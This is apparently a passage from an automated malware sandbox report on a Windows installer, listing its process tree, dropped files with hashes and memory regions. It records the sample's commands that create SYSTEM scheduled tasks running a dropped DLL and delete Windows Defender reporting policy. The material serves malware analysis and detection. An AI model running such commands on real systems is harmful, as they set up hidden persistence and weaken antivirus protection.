C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "xhAFLspUEGhlntx"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "xhAFLspUEGhlntx"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "TGleSCHdxQCUEC" /F /xml "C:\Program Files (x86)\OKneYAAzclQU2\ovoPNeI.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "iixDycgqswbNt2" /F /xml "C:\ProgramData\WoychCUlhHkYXpVB\nwsETZO.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PdJioIBoJxlJjfqRR2" /F /xml "C:\Program Files (x86)\ZiLpQKvFpwQmACSzEAR\KwLhMxO.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uIlXdWmTwvbWFvFElbK2" /F /xml "C:\Program Files (x86)\eCbNXTSQanJlC\HAWgMHY.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jwkhvtMiulvJCTqog" /SC once /ST 03:04:00 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\UIFvrSrxAzeYKEuX\zqQMuYMV\YFAkWDA.dll\",#1 /site_id 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "jwkhvtMiulvJCTqog"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "tRsUEOedRvIwZoOQu"2⤵
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\UIFvrSrxAzeYKEuX\zqQMuYMV\YFAkWDA.dll",#1 /site_id 5254031⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\UIFvrSrxAzeYKEuX\zqQMuYMV\YFAkWDA.dll",#1 /site_id 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "jwkhvtMiulvJCTqog"3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\OKneYAAzclQU2\ovoPNeI.xmlFilesize
2KB
MD56cbe8ad273791ade7c587e5c76c9b7b4
SHA17e9a4b88e1204b076af4b9ec0c58a46ab72259a2
SHA25638aef2406d1614e9119905897b6bacba149274219a0ae8c5f11a958153f9a9b0
SHA512838849388da7138215e19eadcf2bb2b0c0f6c07bafd4844ab7b375d02ecc79fb55ac679f88e9f2bf6234891c18dc9fa925258c04704d2840dadcf330852ed7d0
-
C:\Program Files (x86)\ZiLpQKvFpwQmACSzEAR\KwLhMxO.xmlFilesize
2KB
MD5e3994e0aad9c88e70c4afe0fbfe47e45
SHA144a5976f194baad7af853d4f3279f69e69ad3cae
SHA2564a30b9057e6ea7fb756cef2f3e796872404d902ba3e73fc4b420bb24ffdaa3c6
SHA512a2488bfcbf5d165e4f14ca735f816a365d812d4481bbe187044022afb7fb0e075799d374c8011965e25de95dc83af26a526026dbf20d9bd2460e60ed8a34feb4
-
C:\Program Files (x86)\eCbNXTSQanJlC\HAWgMHY.xmlFilesize
2KB
MD53588026dc12162bbdd02d9b336fca1fd
SHA1ecfacb5106ab9a2bc2517373648b2aa9d0fc5668
SHA25675bc66fc2548d2d8cdcac9f9db219d2aab75ed6d5fb13645d43ee15fb3d52b10
SHA51217d7ad78c86ce45b6963c79b5b794c44475d85711c9837f80683bae66a8c4c112e18474a95bb91d0549dd5154aa116ea67bdd166e90735100726526a8d1d3889
-
C:\Program Files (x86)\wRLQelouU\DpPfrOh.xmlFilesize
2KB
MD55f237fc95bd879a171d307ddf7ad8f8d
SHA1fdce27a49b29c56278f0466528c248a2f1444e5e
SHA256bc6ba72844d1160cea805a37962e2a01fc8ef8a70c444ba49e7083ddda0ec9eb
SHA512ab520bb1c88b5aee3212851271c048d757afa73899eb74ee5c947548a79eb903c64238c7a059b00012683e462aa668b40d8751e320273ecbceb262590be8c3ac
-
C:\ProgramData\WoychCUlhHkYXpVB\nwsETZO.xmlFilesize
2KB
MD5f884f5d3ca7bca507e8b99615726f3f3
SHA1a286f9ce56fd1cc2d89929ae8bb3f2986cd5b125
SHA2569dc5f2f12caf2b02a75a8ed447426bdbdb7da382abe7228f0d5ea3e22766dbc2
SHA512d42956d97cbacb9fb62372d801a3ce5dfa384eb57da980e0a623bddb8982a9266c664ec3e321eb11b6bb9a7e42b7a18ade7ba7c5c85c14d3e4f7f789cc207d50
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.logFilesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD5a6c9d692ed2826ecb12c09356e69cc09
SHA1def728a6138cf083d8a7c61337f3c9dade41a37f
SHA256a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b
SHA5122f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3
-
C:\Users\Admin\AppData\Local\Temp\7zS9407.tmp\Install.exeFilesize
6.3MB
MD58b20ab9e1fc714083eafa2c9d8e4d9d7
SHA1bfd977f06b399c4231806783b0ed27637a1cc9ec
SHA256effe7ab9c5b312a512fe884c03b077a9dcae0176b4cf882cebe903a8ed7d541f
SHA512cf15d7e47e39fa9d8c7b5804898c15f3ac57d2e7639f1527250646ea0e894fafc9028ed0bf07ae3ef75621a066a1ec9bb2f3a1d8ffe5a473e9e6d141db125df6
-
C:\Users\Admin\AppData\Local\Temp\7zS9407.tmp\Install.exeFilesize
6.3MB
MD58b20ab9e1fc714083eafa2c9d8e4d9d7
SHA1bfd977f06b399c4231806783b0ed27637a1cc9ec
SHA256effe7ab9c5b312a512fe884c03b077a9dcae0176b4cf882cebe903a8ed7d541f
SHA512cf15d7e47e39fa9d8c7b5804898c15f3ac57d2e7639f1527250646ea0e894fafc9028ed0bf07ae3ef75621a066a1ec9bb2f3a1d8ffe5a473e9e6d141db125df6
-
C:\Users\Admin\AppData\Local\Temp\7zS99F3.tmp\Install.exeFilesize
6.9MB
MD52cbf7a5984ef2b3f36e26375ed9f8d12
SHA18aac7877150b79530bd87250a67685118a66b964
SHA25606ff91645cc2c770e71f8c2fde6875296bec5ce0bceda64b34b09c2b0bed5b60
SHA512e92a3a03bbf1622f950d57665339a9d73de98817335a6d6eac160b0d9365abb99ce71ca33cc670de343b13fcc5837613832e0d5223039c904b3e18835b8bc49b
-
C:\Users\Admin\AppData\Local\Temp\7zS99F3.tmp\Install.exeFilesize
6.9MB
MD52cbf7a5984ef2b3f36e26375ed9f8d12
SHA18aac7877150b79530bd87250a67685118a66b964
SHA25606ff91645cc2c770e71f8c2fde6875296bec5ce0bceda64b34b09c2b0bed5b60
SHA512e92a3a03bbf1622f950d57665339a9d73de98817335a6d6eac160b0d9365abb99ce71ca33cc670de343b13fcc5837613832e0d5223039c904b3e18835b8bc49b
-
C:\Users\Admin\AppData\Local\Temp\MiBciKVvopIpRLyaf\lPAIFilFZOpRFIX\nDhcZAs.exeFilesize
6.9MB
MD52cbf7a5984ef2b3f36e26375ed9f8d12
SHA18aac7877150b79530bd87250a67685118a66b964
SHA25606ff91645cc2c770e71f8c2fde6875296bec5ce0bceda64b34b09c2b0bed5b60
SHA512e92a3a03bbf1622f950d57665339a9d73de98817335a6d6eac160b0d9365abb99ce71ca33cc670de343b13fcc5837613832e0d5223039c904b3e18835b8bc49b
-
C:\Users\Admin\AppData\Local\Temp\MiBciKVvopIpRLyaf\lPAIFilFZOpRFIX\nDhcZAs.exeFilesize
6.9MB
MD52cbf7a5984ef2b3f36e26375ed9f8d12
SHA18aac7877150b79530bd87250a67685118a66b964
SHA25606ff91645cc2c770e71f8c2fde6875296bec5ce0bceda64b34b09c2b0bed5b60
SHA512e92a3a03bbf1622f950d57665339a9d73de98817335a6d6eac160b0d9365abb99ce71ca33cc670de343b13fcc5837613832e0d5223039c904b3e18835b8bc49b
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
1KB
MD533b19d75aa77114216dbc23f43b195e3
SHA136a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
11KB
MD5be64e468e4b90729cac6bb32fd41edc7
SHA1f2481755f2c4ee1f1ccb6b940462193b1a308afd
SHA256f5888341226d9563db94edd7a68f6c19e2b0aef7f2b0aed1a9d49c4aba3859ba
SHA512a15e13539059e0cb36fdfb4e4302c87d552d445abec1758d35baf4fc09ed6c94a72647daa08060b23e0fe35422d00dd943093d1b990e7bdfcb1c33f61245acbc
-
C:\Windows\Temp\UIFvrSrxAzeYKEuX\VEdIRfVaNlgFjwC\aDhLZTd.exeFilesize
6.9MB
MD52cbf7a5984ef2b3f36e26375ed9f8d12
SHA18aac7877150b79530bd87250a67685118a66b964
SHA25606ff91645cc2c770e71f8c2fde6875296bec5ce0bceda64b34b09c2b0bed5b60
SHA512e92a3a03bbf1622f950d57665339a9d73de98817335a6d6eac160b0d9365abb99ce71ca33cc670de343b13fcc5837613832e0d5223039c904b3e18835b8bc49b
-
C:\Windows\Temp\UIFvrSrxAzeYKEuX\VEdIRfVaNlgFjwC\aDhLZTd.exeFilesize
6.9MB
MD52cbf7a5984ef2b3f36e26375ed9f8d12
SHA18aac7877150b79530bd87250a67685118a66b964
SHA25606ff91645cc2c770e71f8c2fde6875296bec5ce0bceda64b34b09c2b0bed5b60
SHA512e92a3a03bbf1622f950d57665339a9d73de98817335a6d6eac160b0d9365abb99ce71ca33cc670de343b13fcc5837613832e0d5223039c904b3e18835b8bc49b
-
C:\Windows\Temp\UIFvrSrxAzeYKEuX\zqQMuYMV\YFAkWDA.dllFilesize
6.2MB
MD5630ce76ed2167a47b527cefac9f2484c
SHA154cd9466c1584d9c248dcc54700d8b6aac5a91c1
SHA2562e88294e7cfb72cafd8235df3187cdd899b69ea6ffef83f493a39a1ab11636fb
SHA512e64f4507fa2716d1f90959e0db3b4b6b24062be8bcde88fa6b057f782415250e55233b4e7129859b548e90e3bd3c3529f74aec56e6d7e61bb8d6a1bb15de9507
-
C:\Windows\Temp\UIFvrSrxAzeYKEuX\zqQMuYMV\YFAkWDA.dllFilesize
6.2MB
MD5630ce76ed2167a47b527cefac9f2484c
SHA154cd9466c1584d9c248dcc54700d8b6aac5a91c1
SHA2562e88294e7cfb72cafd8235df3187cdd899b69ea6ffef83f493a39a1ab11636fb
SHA512e64f4507fa2716d1f90959e0db3b4b6b24062be8bcde88fa6b057f782415250e55233b4e7129859b548e90e3bd3c3529f74aec56e6d7e61bb8d6a1bb15de9507
-
C:\Windows\system32\GroupPolicy\Machine\Registry.polFilesize
5KB
MD5af5a9b0cf67552db9b66a82d6d3fd4af
SHA1dd4720be6c9cdad2c1f6b4e30e71d9b0acae67e5
SHA2563645932a2885c6129467b5760fd211e021fbe3f4a9e34c620533ed54676e03ed
SHA512c9284f6cbeecd01bd53dbf75e7ebdf16b6f124e000ca6b711996c1c887c2a33596b9084e81069c4da0c0bd14ac8907024ce2c400dd973af5c9c0e95c520213bb
-
C:\Windows\system32\GroupPolicy\gpt.iniFilesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
memory/116-210-0x0000000000000000-mapping.dmp
-
memory/224-149-0x0000000000000000-mapping.dmp
-
memory/920-197-0x0000000000000000-mapping.dmp
-
memory/1092-174-0x0000000000000000-mapping.dmp
-
memory/1180-148-0x0000000000000000-mapping.dmp
-
memory/1208-156-0x0000000000000000-mapping.dmp
-
memory/1392-169-0x0000000000000000-mapping.dmp
-
memory/1464-145-0x0000000000000000-mapping.dmp
-
memory/1464-181-0x0000000000000000-mapping.dmp
-
memory/1472-199-0x0000000000000000-mapping.dmp
-
memory/1488-144-0x0000000000000000-mapping.dmp
-
memory/1596-222-0x0000000000000000-mapping.dmp
-
memory/1628-250-0x0000000001730000-0x0000000002A20000-memory.dmpFilesize
18.9MB
-
memory/1728-153-0x0000000000000000-mapping.dmp
-
memory/1740-187-0x0000000000000000-mapping.dmp
-
memory/1756-221-0x00007FFB5D370000-0x00007FFB5DE31000-memory.dmpFilesize
10.8MB
-
memory/1756-218-0x00007FFB5D370000-0x00007FFB5DE31000-memory.dmpFilesize
10.8MB
-
memory/1800-220-0x0000000000000000-mapping.dmp
-
memory/1924-186-0x0000000000000000-mapping.dmp
-
memory/2052-202-0x0000000000000000-mapping.dmp
-
memory/2088-201-0x0000000000000000-mapping.dmp
-
memory/2128-176-0x0000000000000000-mapping.dmp
-
memory/2452-185-0x0000000000000000-mapping.dmp
-
memory/2468-142-0x0000000000000000-mapping.dmp
-
memory/2504-141-0x0000000000000000-mapping.dmp
-
memory/2504-190-0x0000000000000000-mapping.dmp
-
memory/2720-216-0x0000000000000000-mapping.dmp
-
memory/2992-168-0x0000000004E50000-0x0000000004E6E000-memory.dmpFilesize
120KB
-
memory/2992-167-0x0000000004820000-0x0000000004886000-memory.dmpFilesize
408KB
-
memory/2992-166-0x00000000047B0000-0x0000000004816000-memory.dmpFilesize
408KB
-
memory/2992-165-0x0000000003EC0000-0x0000000003EE2000-memory.dmpFilesize
136KB
-
memory/2992-164-0x0000000003F90000-0x00000000045B8000-memory.dmpFilesize
6.2MB
-
memory/2992-163-0x0000000001540000-0x0000000001576000-memory.dmpFilesize
216KB
-
memory/2992-162-0x0000000000000000-mapping.dmp
-
memory/3084-206-0x0000000000000000-mapping.dmp
-
memory/3192-178-0x0000000000000000-mapping.dmp
-
memory/3220-194-0x0000000000000000-mapping.dmp
-
memory/3224-213-0x0000000000000000-mapping.dmp
-
memory/3236-247-0x0000000018C30000-0x0000000018CE1000-memory.dmpFilesize
708KB
-
memory/3236-243-0x0000000018BB0000-0x0000000018C24000-memory.dmpFilesize
464KB
-
memory/3236-233-0x0000000018490000-0x00000000184FC000-memory.dmpFilesize
432KB
-
memory/3236-229-0x0000000017D80000-0x0000000017E05000-memory.dmpFilesize
532KB
-
memory/3236-226-0x0000000016120000-0x0000000017410000-memory.dmpFilesize
18.9MB
-
memory/3392-203-0x0000000000000000-mapping.dmp
-
memory/3444-172-0x0000000000000000-mapping.dmp
-
memory/3448-205-0x0000000000000000-mapping.dmp
-
memory/3468-138-0x00000000177A0000-0x0000000018A90000-memory.dmpFilesize
18.9MB
-
memory/3468-135-0x0000000000000000-mapping.dmp
-
memory/3492-211-0x0000000000000000-mapping.dmp
-
memory/3500-155-0x0000000000000000-mapping.dmp
-
memory/3580-204-0x0000000000000000-mapping.dmp
-
memory/3788-177-0x0000000000000000-mapping.dmp
-
memory/3796-173-0x0000000000000000-mapping.dmp
-
memory/3884-151-0x000001BD58480000-0x000001BD584A2000-memory.dmpFilesize
136KB
-
memory/3884-152-0x00007FFB5D740000-0x00007FFB5E201000-memory.dmpFilesize
10.8MB
-
memory/3884-154-0x00007FFB5D740000-0x00007FFB5E201000-memory.dmpFilesize
10.8MB
-
memory/3904-175-0x0000000000000000-mapping.dmp
-
memory/3960-191-0x0000000000000000-mapping.dmp
-
memory/3980-200-0x0000000000000000-mapping.dmp
-
memory/4132-150-0x0000000000000000-mapping.dmp
-
memory/4152-215-0x0000000000000000-mapping.dmp
-
memory/4216-180-0x0000000000000000-mapping.dmp
-
memory/4284-207-0x0000000000000000-mapping.dmp
-
memory/4320-170-0x0000000000000000-mapping.dmp
-
memory/4500-179-0x0000000000000000-mapping.dmp
-
memory/4508-159-0x0000000017160000-0x0000000018450000-memory.dmpFilesize
18.9MB
-
memory/4548-209-0x0000000000000000-mapping.dmp
-
memory/4596-188-0x0000000000000000-mapping.dmp
-
memory/4616-198-0x0000000000000000-mapping.dmp
-
memory/4696-208-0x0000000000000000-mapping.dmp
-
memory/4836-189-0x0000000000000000-mapping.dmp
-
memory/4848-146-0x0000000000000000-mapping.dmp
-
memory/4848-182-0x0000000000000000-mapping.dmp
-
memory/4912-183-0x0000000000000000-mapping.dmp
-
memory/4912-147-0x0000000000000000-mapping.dmp
-
memory/4944-192-0x0000000000000000-mapping.dmp
-
memory/4960-212-0x0000000000000000-mapping.dmp
-
memory/4988-143-0x0000000000000000-mapping.dmp
-
memory/5004-132-0x0000000000000000-mapping.dmp
-
memory/5024-223-0x0000000000000000-mapping.dmp
-
memory/5028-171-0x0000000000000000-mapping.dmp
-
memory/5072-193-0x0000000000000000-mapping.dmp
-
memory/5108-184-0x0000000000000000-mapping.dmp